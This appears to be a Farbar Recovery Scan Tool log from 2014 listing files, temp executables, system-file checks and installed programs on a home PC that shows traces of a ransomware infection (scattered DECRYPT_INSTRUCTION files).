2014-10-06 21:48 - 2014-10-06 21:48 - 00004156 _____ () C:\Users\RaRWolf\AppData\Roaming\DECRYPT_INSTRUCTION.TXT
2014-10-06 21:48 - 2014-10-06 21:48 - 00004156 _____ () C:\Users\RaRWolf\AppData\DECRYPT_INSTRUCTION.TXT
2014-10-06 21:48 - 2014-10-06 21:48 - 00000276 _____ () C:\Users\RaRWolf\AppData\Roaming\DECRYPT_INSTRUCTION.URL
2014-10-06 21:48 - 2014-10-06 21:48 - 00000276 _____ () C:\Users\RaRWolf\AppData\DECRYPT_INSTRUCTION.URL
2014-10-06 20:34 - 2014-10-06 20:34 - 00008224 _____ () C:\Users\RaRWolf\AppData\Local\DECRYPT_INSTRUCTION.HTML
2014-10-06 20:34 - 2014-10-06 20:34 - 00004156 _____ () C:\Users\RaRWolf\AppData\Local\DECRYPT_INSTRUCTION.TXT
2014-10-06 20:34 - 2014-10-06 20:34 - 00000276 _____ () C:\Users\RaRWolf\AppData\Local\DECRYPT_INSTRUCTION.URL
2014-10-06 19:43 - 2014-10-06 19:43 - 00008224 _____ () C:\Users\Public\Documents\DECRYPT_INSTRUCTION.HTML
2014-10-06 19:43 - 2014-10-06 19:43 - 00008224 _____ () C:\Users\Public\DECRYPT_INSTRUCTION.HTML
2014-10-06 19:43 - 2014-10-06 19:43 - 00004156 _____ () C:\Users\Public\Documents\DECRYPT_INSTRUCTION.TXT
2014-10-06 19:43 - 2014-10-06 19:43 - 00004156 _____ () C:\Users\Public\DECRYPT_INSTRUCTION.TXT
2014-10-06 19:43 - 2014-10-06 19:43 - 00000276 _____ () C:\Users\Public\Documents\DECRYPT_INSTRUCTION.URL
2014-10-06 19:43 - 2014-10-06 19:43 - 00000276 _____ () C:\Users\Public\DECRYPT_INSTRUCTION.URL
2014-10-06 19:42 - 2014-10-06 19:42 - 00008224 _____ () C:\ProgramData\DECRYPT_INSTRUCTION.HTML
2014-10-06 19:42 - 2014-10-06 19:42 - 00004156 _____ () C:\ProgramData\DECRYPT_INSTRUCTION.TXT
2014-10-06 19:42 - 2014-10-06 19:42 - 00000276 _____ () C:\ProgramData\DECRYPT_INSTRUCTION.URL
2014-10-05 14:34 - 2014-10-22 17:12 - 00000000 ____D () C:\FRST
2014-10-05 14:33 - 2014-10-22 17:11 - 02112000 _____ (Farbar) C:\Users\RaRWolf\Downloads\FRST64.exe
2014-09-30 16:00 - 2014-10-10 22:51 - 00000000 ____D () C:\ProgramData\Windows Genuine Advantage
2014-09-27 14:30 - 2014-09-27 14:30 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Skulltag
2014-09-27 14:30 - 2014-09-27 14:30 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skulltag
2014-09-24 22:41 - 2014-09-24 22:41 - 00001012 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Construct 2.lnk
2014-09-24 22:41 - 2014-09-24 22:41 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\Construct2
 
==================== One Month Modified Files and Folders =======
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-10-22 17:15 - 2013-05-31 19:17 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\uTorrent
2014-10-22 17:11 - 2012-12-29 17:24 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\LogMeIn Hamachi
2014-10-22 17:08 - 2014-08-13 03:25 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\CrashDumps
2014-10-22 17:03 - 2012-12-26 16:37 - 00000000 ____D () C:\Program Files (x86)\Steam
2014-10-22 17:00 - 2012-07-26 04:12 - 00000000 ____D () C:\Windows\system32\sru
2014-10-22 16:59 - 2013-05-08 20:26 - 00000000 ____D () C:\Users\RaRWolf\RaR
2014-10-22 16:40 - 2012-12-26 16:30 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-10-22 16:33 - 2014-03-20 16:54 - 00000934 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-10-22 08:33 - 2014-03-20 16:54 - 00000930 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-10-21 18:54 - 2013-10-28 20:27 - 01132544 ___SH () C:\Users\RaRWolf\Downloads\Thumbs.db
2014-10-21 18:36 - 2012-12-26 14:37 - 00000000 ____D () C:\Users\RaRWolf
2014-10-21 18:28 - 2013-02-21 20:31 - 00000000 ____D () C:\Games
2014-10-21 08:28 - 2014-03-20 16:54 - 00003906 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2014-10-21 08:28 - 2014-03-20 16:54 - 00003670 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2014-10-20 02:01 - 2013-02-05 08:11 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Adobe
2014-10-19 21:16 - 2013-12-16 23:52 - 00000000 ____D () C:\ProgramData\NVIDIA
2014-10-19 21:16 - 2012-07-26 03:22 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-10-19 21:14 - 2012-09-25 07:19 - 01253924 _____ () C:\Windows\WindowsUpdate.log
2014-10-19 11:53 - 2012-09-14 05:25 - 01579054 _____ () C:\Windows\DirectX.log
2014-10-19 11:37 - 2012-07-26 04:12 - 00000000 ____D () C:\Windows\system32\NDF
2014-10-18 18:58 - 2012-09-14 03:47 - 00073604 _____ () C:\Windows\PFRO.log
2014-10-18 18:31 - 2014-07-24 19:28 - 00000000 ____D () C:\Users\RaRWolf\Documents\Inform
2014-10-17 17:39 - 2012-07-26 01:26 - 00262144 ___SH () C:\Windows\system32\config\ELAM
2014-10-15 23:24 - 2012-12-26 14:45 - 00003594 _____ () C:\Windows\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-1557230296-4363482-4078292831-1002
2014-10-14 18:29 - 2013-12-26 14:45 - 00000000 ____D () C:\Users\RaRWolf\Documents\WB Games
2014-10-14 07:23 - 2013-05-26 21:49 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\DAEMON Tools Pro
2014-10-14 07:23 - 2013-05-26 21:38 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\DAEMON Tools Lite
2014-10-14 07:22 - 2014-03-24 15:31 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\Media Player Classic
2014-10-14 06:53 - 2013-07-22 20:00 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\TS3Client
2014-10-14 05:42 - 2013-02-10 21:29 - 00000000 ____D () C:\Windows\Minidump
2014-10-13 18:14 - 2012-09-14 04:59 - 00000000 ____D () C:\Windows\SysWOW64\RTCOM
2014-10-13 18:14 - 2012-07-26 03:21 - 00030344 _____ () C:\Windows\setupact.log
2014-10-13 17:06 - 2012-09-14 04:58 - 00000000 ___HD () C:\Program Files (x86)\Temp
2014-10-13 17:06 - 2012-09-14 04:58 - 00000000 ___HD () C:\Program Files (x86)\InstallShield Installation Information
2014-10-13 17:06 - 2012-09-14 04:58 - 00000000 ____D () C:\Program Files (x86)\Realtek
2014-10-11 11:27 - 2012-07-26 01:26 - 00262144 ___SH () C:\Windows\system32\config\BBI
2014-10-11 04:18 - 2014-07-14 11:33 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Arma 3 Launcher
2014-10-11 03:55 - 2013-06-28 13:33 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Arma 3
2014-10-10 02:16 - 2012-07-26 04:12 - 00000000 ____D () C:\Windows\AUInstallAgent
2014-10-09 16:50 - 2014-06-26 14:31 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\SkypeOld2
2014-10-08 17:56 - 2012-07-26 04:12 - 00000000 ____D () C:\Windows\Help
2014-10-07 19:44 - 2013-01-31 23:33 - 00000000 ___RD () C:\Program Files (x86)\Skype
2014-10-07 19:44 - 2013-01-31 23:32 - 00000000 ____D () C:\ProgramData\Skype
2014-10-07 19:26 - 2013-01-02 23:13 - 00000442 _____ () C:\Windows\system32\Drivers\etc\hosts.ics
2014-10-07 02:31 - 2013-01-13 21:07 - 00000000 ____D () C:\Users\RaRWolf\wurm
2014-10-06 23:01 - 2013-02-23 02:14 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Pivot Animator
2014-10-06 22:27 - 2014-02-21 00:42 - 00000000 ____D () C:\Users\RaRWolf\Random
2014-10-06 22:17 - 2014-03-01 19:24 - 00000000 ____D () C:\Users\RaRWolf\Documents\Space
2014-10-06 22:17 - 2013-03-22 07:10 - 00000000 ____D () C:\Users\RaRWolf\My Games
2014-10-06 22:17 - 2013-01-18 17:50 - 00000000 ____D () C:\Users\RaRWolf\Documents\Wolfire
2014-10-06 22:16 - 2014-08-20 23:59 - 00000000 ____D () C:\Users\RaRWolf\Documents\RCT3
2014-10-06 22:16 - 2014-02-20 23:59 - 00000000 ____D () C:\Users\RaRWolf\Documents\Rainmeter
2014-10-06 22:16 - 2013-09-14 20:24 - 00000000 ____D () C:\Users\RaRWolf\Documents\SimCity 4
2014-10-06 22:16 - 2013-04-27 09:59 - 00000000 ____D () C:\Users\RaRWolf\Documents\Rockstar Games
2014-10-06 22:13 - 2014-08-11 15:24 - 00000000 ____D () C:\Users\RaRWolf\Documents\Oddworld
2014-10-06 22:13 - 2013-06-29 19:51 - 00000000 ____D () C:\Users\RaRWolf\Documents\Nexus Mod Manager
2014-10-06 22:11 - 2014-07-08 18:46 - 00000280 _____ () C:\Users\RaRWolf\Documents\New Text Document.txt
2014-10-06 22:11 - 2013-01-03 19:08 - 00000000 ____D () C:\Users\RaRWolf\Documents\My Games
2014-10-06 22:02 - 2014-04-27 20:36 - 00000000 ____D () C:\Users\RaRWolf\Documents\Klei
2014-10-06 22:02 - 2014-04-06 19:56 - 00000000 ____D () C:\Users\RaRWolf\Documents\Euro Truck Simulator 2
2014-10-06 22:02 - 2014-01-09 16:49 - 00000000 ____D () C:\Users\RaRWolf\Documents\KillHouseGames
2014-10-06 22:02 - 2013-02-17 19:12 - 00000000 ____D () C:\Users\RaRWolf\Documents\Mount&Blade With Fire and Sword
2014-10-06 22:01 - 2014-08-27 11:07 - 00000000 ____D () C:\Users\RaRWolf\Documents\Electrontic Arts
2014-10-06 22:01 - 2013-08-18 16:37 - 00000000 ____D () C:\Users\RaRWolf\Documents\Electronic Arts
2014-10-06 21:59 - 2013-08-14 20:00 - 00000000 ____D () C:\Users\RaRWolf\Documents\EA Games
2014-10-06 21:52 - 2014-07-19 04:13 - 00000000 ____D () C:\Users\RaRWolf\Documents\Dolphin Emulator
2014-10-06 21:52 - 2014-06-18 21:51 - 00000000 ____D () C:\Users\RaRWolf\Documents\BioWare
2014-10-06 21:52 - 2013-07-06 19:20 - 00000000 ____D () C:\Users\RaRWolf\Documents\Arma 3 Alpha
2014-10-06 21:51 - 2013-06-28 13:33 - 00000000 ____D () C:\Users\RaRWolf\Documents\Arma 3
2014-10-06 21:51 - 2013-02-01 08:14 - 00000000 ____D () C:\Users\RaRWolf\Documents\ArmA 2
2014-10-06 21:48 - 2013-06-12 15:50 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\WorldPainter
2014-10-06 21:48 - 2013-03-20 15:25 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\Ubisoft
2014-10-06 21:47 - 2014-02-20 15:21 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\steamvr
2014-10-06 21:47 - 2013-10-23 14:45 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\SpaceEngineers
2014-10-06 21:47 - 2013-09-29 09:24 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\Tropico 4
2014-10-06 21:47 - 2013-01-13 05:00 - 00726071 _____ () C:\Users\RaRWolf\AppData\Roaming\technic-launcher.jar.bak
2014-10-06 21:38 - 2013-01-31 23:33 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\SkypeOld
2014-10-06 21:36 - 2014-08-12 13:17 - 00036632 _____ () C:\Users\RaRWolf\AppData\Roaming\RZR_0180ce6c46479a4dad8b47328d2f.db
2014-10-06 21:36 - 2014-08-01 20:16 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\RealNetworks
2014-10-06 21:36 - 2014-08-01 20:15 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\Real
2014-10-06 21:36 - 2013-11-14 16:21 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\six-updater
2014-10-06 21:36 - 2013-04-27 09:56 - 00000000 __RHD () C:\Users\RaRWolf\AppData\Roaming\SecuROM
2014-10-06 21:35 - 2014-01-13 20:40 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\Nidhogg
2014-10-06 21:35 - 2013-08-14 16:49 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\Origin
2014-10-06 21:35 - 2013-05-12 15:28 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\New Technology Studio
2014-10-06 21:35 - 2013-01-05 18:50 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\Natural Selection 2
2014-10-06 21:22 - 2013-08-08 13:36 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\Mount&Blade Warband
2014-10-06 21:22 - 2013-06-22 22:57 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\MOVAVI
2014-10-06 21:22 - 2013-04-26 15:39 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\MinMaxGames
2014-10-06 21:22 - 2012-12-26 16:28 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\Mozilla
2014-10-06 21:20 - 2014-04-08 22:43 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\ECSoftware
2014-10-06 21:20 - 2013-08-13 22:45 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\DVDVideoSoft
2014-10-06 21:20 - 2013-05-09 06:50 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\Doublefine
2014-10-06 21:20 - 2013-04-26 21:21 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\LOVE
2014-10-06 21:17 - 2014-08-01 19:46 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\Corel
2014-10-06 21:17 - 2014-07-09 15:57 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\DarknessII
2014-10-06 21:17 - 2014-03-27 17:32 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\CreeperWorld3
2014-10-06 21:17 - 2013-05-26 18:01 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\DAEMON Tools Ultra
2014-10-06 20:58 - 2014-08-20 23:59 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\Atari
2014-10-06 20:58 - 2012-12-26 14:39 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\Adobe
2014-10-06 20:57 - 2013-01-13 05:00 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\.techniclauncher
2014-10-06 20:50 - 2013-06-10 17:55 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\.technic
2014-10-06 20:37 - 2013-08-12 15:23 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\.minecraft
2014-10-06 20:34 - 2014-04-24 19:41 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\The Witcher
2014-10-06 20:34 - 2014-04-11 16:55 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\SniperV2
2014-10-06 20:34 - 2014-03-17 18:04 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Skype
2014-10-06 20:34 - 2014-03-05 22:53 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Uber Entertainment
2014-10-06 20:34 - 2013-06-29 12:34 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Skyrim
2014-10-06 20:34 - 2013-04-27 09:56 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Rockstar Games
2014-10-06 20:34 - 2013-03-05 22:55 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\WhatPulse
2014-10-06 20:34 - 2013-01-14 16:51 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Roblox
2014-10-06 20:32 - 2013-12-22 16:23 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Oblivion
2014-10-06 20:32 - 2013-08-22 20:31 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\PAYDAY 2
2014-10-06 20:32 - 2013-08-14 16:49 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Origin
2014-10-06 20:32 - 2013-05-25 18:38 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Play withSIX
2014-10-06 20:32 - 2013-05-12 15:28 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\New Technology Studio
2014-10-06 20:32 - 2013-01-12 13:02 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\PunkBuster
2014-10-06 20:14 - 2014-03-20 16:53 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Google
2014-10-06 20:14 - 2014-01-22 00:09 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\LucasArts
2014-10-06 20:14 - 2013-11-08 18:46 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Introversion
2014-10-06 20:14 - 2013-02-01 19:55 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\IsolatedStorage
2014-10-06 20:13 - 2014-08-27 11:08 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Electronic Arts
2014-10-06 20:13 - 2014-06-27 00:21 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Configuration Tool
2014-10-06 20:13 - 2014-01-29 14:03 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Blizzard
2014-10-06 20:13 - 2014-01-29 12:34 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Blizzard Entertainment
2014-10-06 20:13 - 2013-09-22 09:54 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\FalloutNV
2014-10-06 20:13 - 2013-09-09 18:38 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\CrashRpt
2014-10-06 20:13 - 2013-09-02 21:47 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\BeamNG
2014-10-06 20:13 - 2013-08-22 04:00 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\ESN Sonar
2014-10-06 20:13 - 2013-08-19 21:53 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\EA Games
2014-10-06 20:13 - 2013-08-13 21:49 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Dxtory Software
2014-10-06 20:13 - 2013-04-21 09:29 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Fallout3
2014-10-06 19:53 - 2014-01-29 12:34 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Battle.net
2014-10-06 19:49 - 2013-02-21 16:22 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Apple Computer
2014-10-06 19:49 - 2013-02-01 20:09 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\ArmA 2 OA
2014-10-06 19:49 - 2013-02-01 08:14 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\ArmA 2
2014-10-06 19:49 - 2012-12-26 14:45 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\AMD
2014-10-06 19:48 - 2014-02-21 00:40 - 00000000 ____D () C:\Users\RaRWolf\Agency
2014-10-06 19:48 - 2013-02-22 22:08 - 00000000 ____D () C:\Users\RaRWolf\Adobe
2014-10-06 19:48 - 2013-02-08 12:56 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\AliensVsPredator
2014-10-06 19:43 - 2014-04-14 17:10 - 00000000 ____D () C:\Users\Public\Documents\S.T.A.L.K.E.R. - Call of Pripyat
2014-10-06 19:43 - 2013-10-12 20:13 - 00000000 ____D () C:\Users\RaRWolf\.minecraft
2014-10-06 19:42 - 2014-08-01 20:16 - 00000000 ____D () C:\ProgramData\RealNetworks
2014-10-06 19:42 - 2014-08-01 20:12 - 00000000 ____D () C:\ProgramData\Real
2014-10-06 19:42 - 2014-04-06 15:15 - 00000000 ____D () C:\ProgramData\Steam
2014-10-06 19:42 - 2013-10-28 16:47 - 00000000 ____D () C:\ProgramData\Razer
2014-10-06 19:42 - 2013-05-12 15:43 - 00000000 __SHD () C:\ProgramData\SecuROM
2014-10-06 19:39 - 2014-07-15 13:57 - 00000000 ____D () C:\ProgramData\Logishrd
2014-10-06 19:39 - 2013-10-26 22:40 - 00000000 ____D () C:\ProgramData\GFACE
2014-10-06 19:39 - 2013-08-14 16:48 - 00000000 ____D () C:\ProgramData\Origin
2014-10-06 19:38 - 2014-01-29 12:28 - 00000000 ____D () C:\ProgramData\Battle.net
2014-10-06 19:38 - 2013-08-16 11:27 - 00000000 __SHD () C:\ProgramData\DSS
2014-10-06 19:38 - 2013-06-11 20:32 - 00000000 ____D () C:\ProgramData\Desura
2014-10-06 19:38 - 2013-02-01 20:09 - 00000000 ____D () C:\ProgramData\Bohemia Interactive Studio
2014-10-03 23:44 - 2014-06-18 20:34 - 00000000 ____D () C:\Windows\C5C1C0F0D62F4DBF81D4D7EF397C228B.TMP
2014-10-03 19:22 - 2013-07-23 12:20 - 04920696 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-10-01 14:57 - 2013-09-02 21:46 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\Malwarebytes
2014-10-01 14:57 - 2013-09-02 21:45 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-10-01 14:57 - 2013-09-02 21:45 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes' Anti-Malware
2014-09-28 16:08 - 2013-08-14 16:50 - 00000000 ____D () C:\Program Files (x86)\Origin Games
2014-09-27 14:20 - 2013-01-12 13:02 - 00348928 _____ () C:\Windows\SysWOW64\PnkBstrB.xtr
2014-09-27 14:20 - 2013-01-12 13:00 - 00348928 _____ () C:\Windows\SysWOW64\PnkBstrB.exe
2014-09-27 14:15 - 2013-01-12 13:00 - 00280904 _____ () C:\Windows\SysWOW64\PnkBstrB.ex0
2014-09-27 14:14 - 2013-08-14 16:48 - 00000000 ____D () C:\Program Files (x86)\Origin
2014-09-27 14:11 - 2013-08-20 12:24 - 00000000 ____D () C:\Program Files (x86)\Battlelog Web Plugins
2014-09-22 02:42 - 2013-02-14 18:46 - 00278152 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
 
Files to move or delete:
====================
C:\Users\RaRWolf\AppData\Local\Temp\18b98\AppData\Local\Microsoft\{eaab0735-f4dd-2c20-e526-c77a5339bc54}\{eaab0735-f4dd-2c20-e526-c77a5339bc54}.exe
C:\Users\RaRWolf\DispDiag-20140430-212535-4908-1032.dat
C:\Users\RaRWolf\worldpainter_1.7.1.exe
 
 
Some content of TEMP:
====================
C:\Users\RaRWolf\AppData\Local\Temp\0005029e.exe
C:\Users\RaRWolf\AppData\Local\Temp\00140da6.exe
C:\Users\RaRWolf\AppData\Local\Temp\02642ddf.exe
C:\Users\RaRWolf\AppData\Local\Temp\03362cda.exe
C:\Users\RaRWolf\AppData\Local\Temp\036c3d01.exe
C:\Users\RaRWolf\AppData\Local\Temp\bgdfcffc.exe
C:\Users\RaRWolf\AppData\Local\Temp\obupdat.exe
 
 
==================== Bamital & volsnap Check =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2014-10-14 05:48
 
==================== End Of Log ============================
 
Addition:
 
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 22-10-2014
Ran by RaRWolf at 2014-10-22 17:16:35
Running from C:\Users\RaRWolf\Downloads
Boot Mode: Normal
==========================================================
 
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
 
==================== Installed Programs ======================
 
(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
µTorrent (HKCU\...\uTorrent) (Version: 3.4.2.34309 - BitTorrent Inc.)
A Story About My Uncle (HKLM-x32\...\QVN0b3J5QWJvdXRNeVVuY2xl_is1) (Version: 1 - )
Ace of Spades (HKLM-x32\...\{580A2212-7116-46E6-9229-472E23F1DCC8}) (Version: 0.75.013 - Ben Aksoy)
Ace of Spades (HKLM-x32\...\Steam App 224540) (Version:  - )
Adobe After Effects CS6 (HKLM-x32\...\{4817D846-700B-474E-A31B-80892B3E92E3}) (Version: 11 - Adobe Systems Incorporated)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 3.6.0.5970 - Adobe Systems Incorporated)
Adobe AIR (x32 Version: 3.6.0.5970 - Adobe Systems Incorporated) Hidden
Adobe Download Assistant (HKLM-x32\...\com.adobe.downloadassistant.AdobeDownloadAssistant) (Version: 1.2.5 - Adobe Systems Incorporated)
Adobe Download Assistant (x32 Version: 1.2.5 - Adobe Systems Incorporated) Hidden
Adobe Flash Player 15 Plugin (HKLM-x32\...\Adobe Flash Player Plugin) (Version: 15.0.0.152 - Adobe Systems Incorporated)
Adobe Help Manager (HKLM-x32\...\chc.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 4.0.244 - Adobe Systems Incorporated)
Adobe Help Manager (x32 Version: 4.0.244 - Adobe Systems Incorporated) Hidden
Adobe Reader X (10.1.3) MUI (HKLM-x32\...\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}) (Version: 10.1.3 - Adobe Systems Incorporated)
Adobe Shockwave Player 12.0 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.0.4.144 - Adobe Systems, Inc.)
AI Suite II (HKLM-x32\...\{34D3688E-A737-44C5-9E2A-FF73618728E1}) (Version: 2.00.01 - ASUSTeK Computer Inc.)
AIMP3 (HKLM-x32\...\AIMP3) (Version: v3.55.1355, 14.07.2014 - AIMP DevTeam)
Alien Swarm (HKLM-x32\...\Steam App 630) (Version:  - Valve)
Ancient Weapon Sounds (HKLM-x32\...\{D91802D9-6A42-4563-BC37-B3E2D04DC95B}) (Version: 2.1.0 - Screaming Bee)
Apple Application Support (HKLM-x32\...\{46F044A5-CE8B-4196-984E-5BD6525E361D}) (Version: 2.3.6 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{2F72F540-1F60-4266-9506-952B21D6640D}) (Version: 6.1.0.13 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
Arma 3 (HKLM-x32\...\Steam App 107410) (Version:  - Bohemia Interactive)
Artemis Artemis (HKLM-x32\...\Artemis) (Version: 2.00.0 - Thom Robertson)
Assassin's Creed II (HKLM-x32\...\{8570BEE8-0CA3-4977-9AB1-80ED93F0513C}) (Version: 1.01 - Ubisoft)
Assassins Creed IV Black Flag (HKLM-x32\...\Uplay Install 273) (Version:  - Ubisoft)
Assassin's Creed Revelations (HKLM-x32\...\{33A22B2D-55BA-4508-B767-BF2E9C21A73F}) (Version: 1.00 - Ubisoft)
ASUS Ai Charger (HKLM-x32\...\{7FB64E72-9B0E-4460-A821-040C341E414A}) (Version: 1.03.00 - ASUSTeK Computer Inc.)
ASUS Easy Update (HKLM-x32\...\{E7AA854E-6756-424E-84C2-4E47D5729AFF}) (Version: 2.00.28 - ASUSTeK Computer Inc)
ASUS WebStorage Sync Agent (HKLM-x32\...\ASUS WebStorage) (Version: 1.1.3.105 - ASUS Cloud Corporation)
ASUSDVD (HKLM-x32\...\InstallShield_{DEC235ED-58A4-4517-A278-C41E8DAEAB3B}) (Version: 10.0.4126.52 - CyberLink Corp.)
ASUSDVD (x32 Version: 10.0.4126.52 - CyberLink Corp.) Hidden
Audacity 2.0.3 (HKLM-x32\...\Audacity_is1) (Version: 2.0.3 - Audacity Team)
Auto Clicker v1.3 (HKLM-x32\...\{C0A7E4F3-82CC-416B-82C6-BA06AACFD635}_is1) (Version: 1.3 - MurGee.com)
Autodesk SketchBook Pro 6.2.4 (HKLM-x32\...\{B882B2FC-D21E-4BCA-A173-4855757DE84A}) (Version: 6.24.0000 - Autodesk)
Battle.net (HKLM-x32\...\Battle.net) (Version:  - Blizzard Entertainment)
Battlefield 1942™ (HKLM-x32\...\{5BE7BD06-512B-43bf-AD78-3BD2A5F5F7B3}) (Version: 1.6.20.0 - Electronic Arts)
Battlefield 3™ (HKLM-x32\...\{76285C16-411A-488A-BCE3-C83CB933D8CF}) (Version: 1.6.0.0 - Electronic Arts)
Battlefront Extreme 2.2 (HKLM-x32\...\{AFD834CA-4579-49DF-9CF0-EA58822A7C2E}_is1) (Version:  - )
Battlelog Web Plugins (HKLM-x32\...\Battlelog Web Plugins) (Version: 2.5.1 - EA Digital Illusions CE AB)
BattlEye for OA Uninstall (HKLM-x32\...\BattlEye for OA) (Version:  - )
BeamNG-Techdemo-0.3 (remove only) (HKCU\...\BeamNG-Techdemo-0.3) (Version:  - )
